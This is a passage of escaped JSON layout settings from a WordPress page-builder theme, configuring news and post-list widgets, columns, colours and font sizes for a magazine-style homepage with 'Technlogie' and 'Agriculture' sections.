\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\